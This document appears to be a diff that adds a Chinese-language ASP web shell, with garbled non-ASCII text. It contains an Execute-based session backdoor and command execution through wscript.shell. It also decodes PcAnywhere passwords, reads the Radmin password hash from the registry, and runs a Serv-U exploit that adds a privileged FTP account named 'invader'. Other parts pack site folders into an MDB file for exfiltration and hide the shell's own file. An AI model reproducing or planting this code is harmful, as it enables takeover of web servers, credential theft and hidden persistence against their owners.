+'--------------------------------------------------------------------
+mNametitle ="���˽�ʬ����"  ' ����
+Copyright="sb"  '��Ȩ
+SItEuRl="http://aspuma.cccpan.com" '�����վ
+bg ="http://tophack.net/shell/akill.jpg"  '����ͼƬ,��ʹ������
+ysjb=true  '�Ƿ����϶�Ч��,trueΪ��,falseΪ��
+'����PR��ѯ���ܣ�����ɾ�������ļ���
+'��������,�Ż�����.
+'����˫��ͼƬ�������Ҫ��ͼƬ�������޸ĵ�ַ
+'--------------------------------------------------------------------
+Server.ScriptTimeout=999999999
+Response.Buffer =true
+BodyColor="#000000"
+FontColor="#b4a9a9"
+LinkColor="#ffffff"
+On Error Resume Next 
+strBAD="If Request(""#"")<>"""" Then Session(""#"")=Request(""#"")"&VbNewLine
+strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))"
+Const DEfd=""
+sub ShowErr()
+ If Err Then
+j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
+Err.Clear:Response.Flush
+  End If
+end sub
+Sub j(str)
+response.write(str)
+End Sub
+sub RaPath(s)
+RaPath=ExecuteGlobal(s)
+End sub
+Function RePath(S)
+RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ScriptPath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action")
+RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
+FolderPath=Request("FolderPath")
+u=request.servervariables("http_host")&url
+domain=Request.ServerVariables("http_host")
+url=request.servervariables("url")
+uu=request.servervariables("http_host")&url
+pp=userpass
+FName=Request("FName")
+cdx="<tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#191919'"">":cxd="<font face='wingdings'>8</font>":ef="</a></td></tr>"
+set fso=server.CreateObject(CONST_FSO)
+set fsoX=server.CreateObject(CONST_FSO)
+str1="http://"&Request.ServerVariables("SERVER_Name")& left(Request.ServerVariables("URL"),InstrRev(Request.ServerVariable("URL"),"/"))
+BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+j "<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312""><title>"&mNametitle&" - "&ServerIP&" </title><style type=""text/css"">span.underline{text-decoration:underline;}span.orange{color:#B3D169;}span.project_type{text-align:right}span.grey{color:#666;}#links{list-style-type:none;padding:20px 0 0 0;padding-left:20px;}#linklist2  td{color:#fff;background:#191919;}#linklist2 td:visited{color:#999;}#linklist2 td:hover{background:#B3D169;color:#191919;}body,tr,td{margin-top: 5px;background-color: #000000;color: #b4a9a9;font-size: 12px;SCROLLBAR-FACE-COLOR: #232323;scrollbar-arrow-color: #383839;scrollbar-highlight-color: #383839;scrollbar-3dlight-color: #dddddd;scrollbar-shadow-color: #232323}.sb{cursor: hand}input,select,textarea{border-top-width: 1px;font-weight: bold;border-left-width: 1px;font-size: 11px;border-left-color: #dddddd;background: #000000;border-bottom-width: 1px;border-bottom-color: #dddddd;color: #dddddd;border-top-color: #dddddd;font-family: verdana;border-right-width: 1px;border-right-color: #dddddd;}#d{background: #121212;padding-left: 5px;padding-right: 5px;font-color: #fff}pre{font-size: 11px;font-family: verdana;color: #dddddd;}hr{color: #dddddd;background-color: #dddddd;height: 5px;}#x{font-family: verdana;font-size: 13px}a{color: #ffffff;text-decoration: none;}.am{color: #b4a9a9;font-size: 11px;}</style>"
+j"<script>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""ȷ��Ҫִ�д˲�����""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""��"&Copyright&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""�����븴�Ƶ�Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""�������ƶ���Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""������Ҫ�½����ļ���ȫ����"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}</script>"
+j"<body" :If Action="" then j " scroll=no":j ">"
+Dim ObT(18,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "�� �� �� �� �� ��":ObT(1,0) = "wscript.shell":ObT(1,2) = "������ִ�����,��ʾ'<font color=red>��</font>'ʱ��<a href='?Action=cmdx' target='FileFrame'> <font color=red> ִ��Cmd��</font></a> �˹���ִ��":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS �� �� �� ��":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS ѹ �� �� ��":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "������ �� �� ���� ���":ObT(5,0) = "Adodb.connection":ObT(5,2) = "���ݿ� ���� ���":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "������ �ϴ� ���":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp �ļ� �ϴ� ���":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "���Ʒ� �ļ� �ϴ� ���":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload �ļ� �ϴ� ���":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail �ʼ� �շ� ���":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "����SMTP ���� ���":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail ���� ���":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "���� ���� ���"
+ObT(14,0) = "ws"&"cript.shell.1":  OBt(14,2) = "���wsh���������Ը���������":OBT(15,0) = "WS"&"CRIPT.NETWORK":  OBt(15,2) = "�鿴��������Ϣ���������ʱ����������Ȩ":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation ��������FSOʱ�����ļ��Լ�ִ������":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation �ı�������FSOʱ�����ļ��Լ�ִ������":OBT(18,0) = "Shell.Users":OBt(18,2) = "ɾ����net.exe net1.exe������������û������"
+For i=0 To 18:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ��":Else:IsObj=" ��":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if
+Function PcAnywhere4()
+j"<div align='center'>PcAnywhere��Ȩ Bin�汾</div><form name='xform' method='post'><table width='80%'border='0'><tr><td width='10%'>cif�ļ�: </td><td width='10%'><input name='path' type='text' value='C:\Documents and Settings\All Users\Application Data\\Symantec\pcAnywhere\Citempl.cif' size='80'></td><td><input type='submit' value=' �ύ '></td></table>"
+end Function
+
+j"</form><script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>"
+
+
+
+
+Function StreamLoadFromFile(sPath)
+Dim oStream
+Set oStream = Server.CreateObject("Adodb.Stream")
+With oStream
+.Type = 1
+.Mode = 3
+.Open
+.LoadFromFile(sPath)
+.Position = 0
+StreamLoadFromFile = .Read
+.Close
+End With
+Set oStream = Nothing
+End Function
+Function hexdec(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+ j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+ j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+ j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+ j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+ j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+ j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+ j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+ j = j * 16 
+Next 
+result = result + j 
+Next 
+hexdec = result 
+End Function 
+sub promyself()
+On Error Resume Next 
+set f=fso.GetFile(ScriptPath)
+if f.Attributes <> 39 and session("lock")="" then
+f.Attributes=1+2+4+32
+end if
+set f=nothing
+end sub
+promyself
+Function PcAnywhere(data,mode)
+HASH= Mid(data,3)
+If mode = "pass" Then number = 32: Cifnum = 144
+If mode = "user" Then number = 30: Cifnum = 15
+For i = 1 To number Step 2 
+pcstr=((hexdec(Mid(data,i,2)) xor hexdec(Mid(hash,i,2))) xor Cifnum)
+If ((pcstr <= 32) Or (pcstr>127)) Then Exit For 
+decode = decode + Chr(pcstr)
+Cifnum=Cifnum+1
+Next 
+PcAnywhere=decode
+End function
+Function bin2hex(binstr)
+For i = 1 To LenB(binstr)
+hexstr = Hex(AscB(MidB(binstr, i, 1)))
+If Len(hexstr)=1 Then 
+bin2hex=bin2hex&"0"&(LCase(hexstr))
+Else
+bin2hex=bin2hex& LCase(hexstr)
+End If 
+Next
+End Function
+CIF = Request("path")
+If CIF <> "" Then 
+BinStr=StreamLoadFromFile(CIF) 
+j"Pcanywhere Reader ==><br><br>PATH:"&CIF&"<br>�ʺ�:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user")
+j"<br>����:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass")
+End If 
+Function radmin()
+Set WSH= Server.CreateObject("WSCRIPT.SHELL")
+RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
+Parameter="Parameter"
+Port = "Port"
+j"<br>ע��:����HASHֵ����RadminHash���߻�od�������ӣ��������ص�ַ:"&htp&"soft/Radmin_hash.rar<br><br>"
+ParameterArray=WSH.REGREAD(RadminPath & Parameter )
+j Parameter&":"
+If IsArray(ParameterArray) Then
+For i = 0 To UBound(ParameterArray)
+If  Len (hex(ParameterArray(i)))=1 Then 
+strObj = strObj & "0"&CStr(Hex(ParameterArray(i)))
+Else
+strObj = strObj & Hex(ParameterArray(i))
+End If 
+Next
+j strobj
+Else
+j"Error! Can't Read!"
+End If
+j"<br><br>"
+PortArray=WSH.REGREAD(RadminPath & Port )
+If IsArray(PortArray) Then 
+j Port &":" 
+j hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
+Else 
+j"Error! Can't Read!"
+End If
+End Function
+Function hextointer(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+j = j * 16 
+Next 
+result = result + j 
+Next 
+hextointer = result 
+End Function
+
+Function MainForm()
+j "<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame""><input type=""hidden"" name=""Action""><input type=""hidden"" name=""FName""></form><table width='100%'><form name='addrform' method='post' action='"&URL&"' target='_parent'><tr><td width='60' align='center'><input type='button' value='Address'></td><td><input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'></td><td width='140' align='center'><input name='Submit' type='submit' value='GO'> <input type='submit' value='Refresh' onclick='FileFrame.location.reload()'></td></tr></form></table>"
+j"<td><a class=am href='javascript:ShowFolder(""C:\\Program Files"")'>(1)��Program��<a><a class=am href='javascript:ShowFolder(""d:\\Program Files"")'>(2)��ProgramD��<a><a class=am href='javascript:ShowFolder(""e:\\Program Files"")'>(3)��ProgramE��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>(4)��Documents��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>(5)��All_Users��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\"")'>(6)���_ʼ_�ˆΡ�<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>(7)����_��<a><a class=am href='javascript:ShowFolder(""C:\\recycler"")'>(8)��RECYCLER(C:\)��<a><a class=am href='javascript:ShowFolder(""D:\\recycler"")'>(9)��RECYCLER(d:\)��<a><a class=am href='javascript:ShowFolder(""e:\\recycler"")'>(10)��RECYCLER(e:\)��<a>":j"<br><a class=am href='javascript:ShowFolder(""C:\\wmpub"")'>(1)��wmpub��<a><a class=am href='javascript:ShowFolder(""C:\\WINDOWS\\Temp"")'>&nbsp;&nbsp;(2)��TEMP��<a>&nbsp;&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\Program Files\\RhinoSoft.com"")'>(3)��ServU(1)��<a><a  class=am href='javascript:ShowFolder(""C:\\Program Files\\ServU"")'>(4)��ServU(2)��<a>&nbsp;<a class=am href='javascript:ShowFolder(""C:\\WINDOWS"")'>(5)��WINDOWS��<a>&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\php"")'>(6)��PHP��<a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a  class=am href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>(7)��Mssql��<a><a class=am href='javascript:ShowFolder(""c:\\prel"")'>(8)��prel�ļ��С�<a>&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""c:\\docume~1\\alluse~1\\Application Data\\Symantec\\pcAnywhere"")'>(9)��pcAnywhere��<a>   <a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����"")'>(10)��Alluser���桿<a>":j"</td>"
+j "<table width='100%' height='95.5%' style='border:1px solid #000000;' cellpadding='0' cellspacing='0'><td width='160' id=tl><iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td><td width=1 style='background:#000000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#424242'><td><iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe></tr></form></table></td></tr><tr></tr></table>"
+if session("aase") <> "ok" then:response.write Efun:session("aase")="ok":end if
+End Function
+Sub PageAddToMdb()
+Dim theAct, thePath
+theAct = Request("theAct")
+thePath = Request("thePath")
+Server.ScriptTimeOut=100000
+If theAct = "addToMdb" Then
+addToMdb(thePath)
+j "<div align=center><br>�������!</div>"&BackUrl
+Response.End
+End If
+If theAct = "releaseFromMdb" Then
+unPack(thePath)
+j "<div align=center><br>�������!</div>"&BackUrl
+Response.End
+End If
+j"<br>�ļ��д��:<form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80><input type=hidden value=addToMdb name=theAct><select name=theMethod><option value=fso>FSO</option><option value=app>��FSO</option></select><input type=submit value='��ʼ���'><br><br>ע: �������HSH.mdb�ļ�,λ��samľ��ͬ��Ŀ¼��</form><hr/>�ļ����⿪(��FSO֧��):<br/><form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & "\HSH.mdb"" size=80><input type=hidden value=releaseFromMdb name=theAct><input type=submit value='�⿪��'><br><br>ע: �⿪���������ļ���λ�ڱ�����Ŀ¼��</form>"
+End Sub
+Sub addToMdb(thePath)
+On Error Resume Next
+Dim rs, conn, stream, connStr, adoCatalog
+Set rs = Server.CreateObject("ADODB.RecordSet")
+Set stream = Server.CreateObject("ADODB.Stream")
+Set conn = Server.CreateObject("ADODB.Connection")
+Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb")
+adoCatalog.Create connStr
+conn.Open connStr
+conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+stream.Open
+stream.Type = 1
+rs.Open "FileData", conn, 3, 3
+If Request("theMethod") = "fso" Then
+fsoTreeForMdb thePath, rs, stream
+ Else
+saTreeForMdb thePath, rs, stream
+End If
+rs.Close
+Conn.Close
+stream.Close
+Set rs = Nothing
+Set conn = Nothing
+Set stream = Nothing
+Set adoCatalog = Nothing
+End Sub
+Function fsoTreeForMdb(thePath, rs, stream)
+Dim item, theFolder, folders, files, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+If Server.CreateObject(CONST_FSO).FolderExists(thePath) = False Then
+showErr(thePath & " Ŀ¼�����ڻ��߲���������!")
+End If
+Set theFolder = Server.CreateObject(CONST_FSO).GetFolder(thePath)
+Set files = theFolder.Files
+Set folders = theFolder.SubFolders
+For Each item In folders
+fsoTreeForMdb item.Path, rs, stream
+Next
+For Each item In files
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+Next
+End Function
+Sub unPack(thePath)
+On Error Resume Next
+Server.ScriptTimeOut=100000
+Dim rs, ws, str, conn, stream, connStr, theFolder
+str = Server.MapPath(".") & "\"
+Set rs = CreateObject("ADODB.RecordSet")
+Set stream = CreateObject("ADODB.Stream")
+Set conn = CreateObject("ADODB.Connection")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+conn.Open connStr
+rs.Open "FileData", conn, 1, 1
+stream.Open
+stream.Type = 1
+Do Until rs.Eof
+theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+If Server.CreateObject(CONST_FSO).FolderExists(str & theFolder) = False Then
+createFolder(str & theFolder)
+End If
+stream.SetEos()
+stream.Write rs("fileContent")
+stream.SaveToFile str & rs("thePath"), 2
+rs.MoveNext
+Loop
+rs.Close
+conn.Close
+stream.Close
+Set ws = Nothing
+Set rs = Nothing
+Set stream = Nothing
+Set conn = Nothing
+End Sub
+Dim Filepaths
+set Filepaths=new SearchFile
+Filepaths.Class_Folder Filename
+Sub createFolder(thePath)
+Dim i
+i = Instr(thePath, "\")
+Do While i > 0
+If Server.CreateObject(CONST_FSO).FolderExists(Left(thePath, i)) = False Then
+Server.CreateObject(CONST_FSO).CreateFolder(Left(thePath, i - 1))
+End If
+If InStr(Mid(thePath, i + 1), "\") Then
+i = i + Instr(Mid(thePath, i + 1), "\")
+ Else
+i = 0
+End If
+Loop
+End Sub
+Sub saTreeForMdb(thePath, rs, stream)
+Dim item, theFolder, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+Set theFolder = saX.NameSpace(thePath)
+For Each item In theFolder.Items
+If item.IsFolder = True Then
+saTreeForMdb item.Path, rs, stream
+ Else
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+End If
+Next
+Set theFolder = Nothing
+End Sub
+Function ProFile()
+If Request("Action2")="Post" Then
+Randomize
+dim pass2,num1
+pass2=""
+Do While Len(pass2)<8
+if Len(pass2)<=4 then
+num1=CStr(Chr((122-97)*rnd+97)) 'a~z 
+else
+num1=CStr(Chr((57-48)*rnd+48)) '0~9 
+end if
+pass2=pass2&num1
+loop 
+pass2=ucase(pass2)
+Application(pass2)=1
+Application(pass2&"File")=request("AFile")
+Application(pass2&"Code")=request("ACode")
+Application(pass2&"Time")=request("ATime")
+Application(pass2&"Char")=request("AChar")
+j"<br><br><br><center>�������� <font color=yellow>"&pass2&"</font> ���ɳɹ������<a style=""text-decoration:underline;font-weight:bold"" href="&URL&"?ProFile="&pass2&" target=_blank>����</a>�������̡�</center><br>"
+Response.End
+End If
+SI="<br><table border='0' cellpadding='0' cellspacing='0'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=ProFile&Action2=Post'"
+SI=SI&"<tr><td valign=top style='line-height:22px' align=right><input type=""hidden"" name=""vvva"" value=""0"">��Ҫ�������ļ�·����<br><font color=yellow>��ͬʱ��������ļ�&nbsp;&nbsp;<br>ÿ��һ���ļ�·��&nbsp;&nbsp;</font></td><td>"
+SI=SI&"<textarea name=""AFile"" cols=""70"" rows=""7"">"&RRePath(Session("FolderPath")&"\test.asp")&"</textarea></td></tr>"
+SI=SI&"<tr><td valign=top style=""padding-top:3px;"" align=right>�ļ����룺</td><td><textarea name=""ACode"" cols=""70"" rows=""7"">�ļ�����</textarea></td></tr>"
+SI=SI&"<tr><td align=right>�ļ����룺</td><td><input type=""radio"" name=""AChar"" value=""1"" checked />GB2312  <input type=""radio"" name=""AChar"" value=""2"" />UTF-8 (�����ļ����������룬�볢�Ը��ı���)</td></tr>"
+SI=SI&"<tr><td align=right>����Ƶ�ʣ�</td><td><input type=""text"" name=""ATime"" style=""text-align:right"" value=""1"" size=""5"" onkeyup=""value=value.replace(/[^\d]/g,'')"" /> �� (��СΪ1�룬��Ҫ�������ļ�Խ�࣬Ƶ������Խ�󣬷����޷�ȫ������)</td></tr>"
+SI=SI&"<tr><td>&nbsp;</td><td height=50><input type='submit' name='Submit' value='��һ�������ɱ�������'></td></tr>"
+SI=SI&"</form></table>"
+j SI
+End Function
+Function suftp()
+j"<center><br><form name='form1' method='post' action=''><table width='500'><tr align='center' valign='middle'><td colspan='2' id=s><font face=webdings>8</font> <B>���ɰ汾��Ϣ</b></td></tr><tr align='center'><td id=d>ϵͳ�˺ţ�</td><td id=d><input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'></td></tr><tr align='center'><td id=d>ϵͳ���</td><td id=d><input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'></td></tr><tr align='center'><td id=d>ϵͳ�˿ڣ�</td><td id=d><input name='dport' type='text' class='TextBox' id='dport' value='43958'></td></tr><tr align='center'><td id=d>�¼��˺ţ�</td><td id=d><input name='tuser' type='text' class='TextBox' id='tuser' value='invader'></td></tr><tr align='center'><td id=d>�¼ӿ��</td><td id=d><input name='tpass' type='text' class='TextBox' id='pass' value='1'></td></tr><tr align='center'><td id=d>����·����</td><td id=d><input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'></td></tr><tr align='center'><td id=d>����˿ڣ�</td><td id=d><input name='tport' type='text' class='TextBox' id='tport' value='21'></td></tr><tr align='center'><td id=d>ִ������</td><td id=d><input name='radiobutton' type='radio' value='add' checked class='TextBox' id=d>ȷ������&nbsp;<input type='radio' name='radiobutton' value='del' class='TextBox' id=d>ȷ��ɾ��</td></tr><tr align='center' valign='middle'><td colspan='2' id=d><input type='submit' name='Submit' value='Just Go'>&nbsp;<input type='reset' name='Submit2' value='Reset'><input name='SUaction' type='hidden' id='action' value='1'></td></tr></table></form></center>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+'Command = request.Form("dcmd")
+if request.Form("radiobutton") = "add" Then
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
+"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
+"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
+"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
+"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
+"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
+"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
+On Error Resume Next
+Set xPost = CreateObject("MSXML2.XMLHTTP")
+xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost.Send(leaves)
+Set xPOST=nothing
+j ("����ɹ�ִ�У���FTP �û���: " & tuser & " " & "����: " & tpass & " ·��: " & tpath & " :)<br><BR>")
+else
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
+Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost3.Send(leaves)
+Set xPOST3=nothing
+end if
+End Function
+Function MainMenu()
+j"<script language=javascript>function MM_show(s){if (document.getElementById(s).style.display==""""){document.getElementById(s).style.display=""none"";}else{document.getElementById(s).style.display="""";}}</script><table width='100%' cellspacing='0' cellpadding='0'><tr><td height='5'></td></tr><tr><td><center><font color=pink><font size=1.0>"&mName&"</font></font></center><hr color=#424242 size=1 ></td></tr>":If ObT(0,1)=" ��" Then
+j"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+j"<tr><td onClick=""MM_show('menud')""><input onMouseOver=""this.style.cursor='hand'"" type=button value='Disk & Files'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menud style=""display='none'"">"
+Set ABC=New LBF:j ABC.ShowDriver():Set ABC=Nothing
+j"</table></td></tr><tr><td valign=""top"" align=center><table border=0><tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'""><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'><font face='wingdings'>8</font> վ���Ŀ¼"&ef
+j cdx&"<a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>"&cxd&" ������Ŀ�"&ef
+j cdx&"<a href='?Action=goback' target='FileFrame'>"&cxd&" ���ϼ�Ŀ¼"&ef
+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\Newfile")&""",""NewFolder"")'>"&cxd&" �½�--Ŀ�"&ef
+j cdx&"<a href='?Action=EditFile' target='FileFrame'>"&cxd&" �½�--�ı�"&ef
+j cdx&"<a href='?Action=UpFile' target='FileFrame'>"&cxd&" �ϴ�--�ļ�"&ef
+j cdx&"<a href='?Action=Cmd1Shell' target='FileFrame'>"&cxd&" ִ��---CMD"&ef
+j cdx&"<a href='?Action=cmdx' target='FileFrame'>"&cxd&" ִ��--CMD2"&ef
+j cdx&"<a href='?Action=ScanDriveForm' target='FileFrame'>"&cxd&" ����--Ȩ��"&ef
+j cdx&"<a href='?Action=CustomScanDriveForm' target='FileFrame'>"&cxd&"  <font color=red>��д--Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=php' target='FileFrame'>"&cxd&" �ű�--̽��"&ef
+j cdx&"<a href='?Action=PageAddToMdb' target='FileFrame'>"&cxd&" ���������"&ef
+j cdx&"<a href='?Action=upload' target='FileFrame'>"&cxd&" ����--�ļ�"&ef&"</table><hr></td></tr>"
+End If
+j"</tr><tr><td height=4></td></tr><tr><td onClick=""MM_show('menuc')""><input onMouseOver=""this.style.cursor='hand1'"" type=button value='Information'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menuc style=""display=''"">"
+j cdx&"<a href='?Action=Course' target='FileFrame'>"&cxd&" �û�__�˺�"&ef
+j cdx&"<a href='?Action=getTerminalInfo' target='FileFrame'>"&cxd&" �˿�__����"&ef
